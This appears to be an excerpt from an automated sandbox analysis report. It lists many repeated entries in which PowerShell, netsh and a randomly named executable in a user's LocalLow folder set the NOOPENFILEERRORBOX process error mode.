Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
